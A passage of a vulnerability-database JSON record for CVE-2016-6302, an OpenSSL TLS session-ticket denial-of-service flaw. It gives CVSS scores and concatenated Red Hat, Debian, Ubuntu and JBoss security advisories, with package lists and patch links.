"version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-6302", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-6302", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201608-449", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-6302", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6302" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "CNNVD", "id": "CNNVD-201608-449" }, { "db": "NVD", "id": "CVE-2016-6302" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The tls_decrypt_ticket function in ssl/t1_lib.c in OpenSSL before 1.1.0 does not consider the HMAC size during validation of the ticket length, which allows remote attackers to cause a denial of service via a ticket that is too short. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status\nrequest extension data during session renegotiation. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that OpenSSL did not always use constant time\noperations when computing Digital Signature Algorithm (DSA) signatures. A\nlocal attacker could possibly use this flaw to obtain a private DSA key\nbelonging to another user or service running on the same system. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. \n(CVE-2016-2179)\n\n* A flaw was found in the Datagram TLS (DTLS) replay protection\nimplementation in OpenSSL. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. An attacker able to make an application using OpenSSL to process\na large BIGNUM could cause the application to crash or, possibly, execute\narbitrary code. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. A remote attacker could use this\nflaw to crash a TLS server using OpenSSL if it used SHA-512 as HMAC for\nsession tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. An attacker could\npossibly cause an application using OpenSSL to crash if it printed time\nstamp data from the attacker. (CVE-2016-2180)\n\n* Multiple out of bounds read flaws were found in the way OpenSSL handled\ncertain TLS/SSL protocol handshake messages. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. Upstream\nacknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter\nof CVE-2016-6304 and CVE-2016-6306; and Karthikeyan Bhargavan (Inria) and\nGaA\u003c\u003ctan Leurent (Inria) as the original reporters of CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. \n\nWe recommend that you upgrade your openssl packages. ==========================================================================\nUbuntu Security Notice USN-3087-1\nSeptember 22, 2016\n\nopenssl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This\nissue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n\nQuan Luo discovered that OpenSSL did not properly restrict the lifetime\nof queue entries in the DTLS implementation. (CVE-2016-2181)\n\nShi Lei discovered that OpenSSL incorrectly validated division results. \n(CVE-2016-2182)\n\nKarthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\nciphers were vulnerable to birthday attacks. \n(CVE-2016-2183)\n\nShi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n\nShi Lei discovered that OpenSSL incorrectly performed certain message\nlength checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.4\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.20\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.37\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nThis release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer\nto the Release Notes for information on the most significant bug fixes,\nenhancements and component upgrades included in this release. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-373 - Errata for httpd 2.4.29 GA RHEL 7\n\n7", "sources": [ { "db": "NVD", "id": "CVE-2016-6302" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "BID", "id": "92628" }, { "db": "VULMON", "id": "CVE-2016-6302" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-6302", "trust": 3.4 }, { "db": "BID", "id": "92628", "trust": 2.0 }, { "db": "SECTRACK", "id": "1036885", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004781", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201608-449", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-6302", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148521", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148525", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148524", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6302" }, { "db": "BID", "id": "92628" }, { "db": "JVNDB", "id": "JVNDB-2016-004781" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "CNNVD", "id": "CNNVD-201608-449" }, { "db": "NVD", "id": "CVE-2016-6302" } ] }, "id": "VAR-201609-0347", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.37975769357142847 }, "last_update_date": "2024-07-23T20:02:01.581000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Sanity check ticket length.", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=e97763c92c655dcf4af2860b3abd2bc4c8a267f9" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2016-3090566.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "OpenSSL Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=63772" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182187 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 RHEL 7 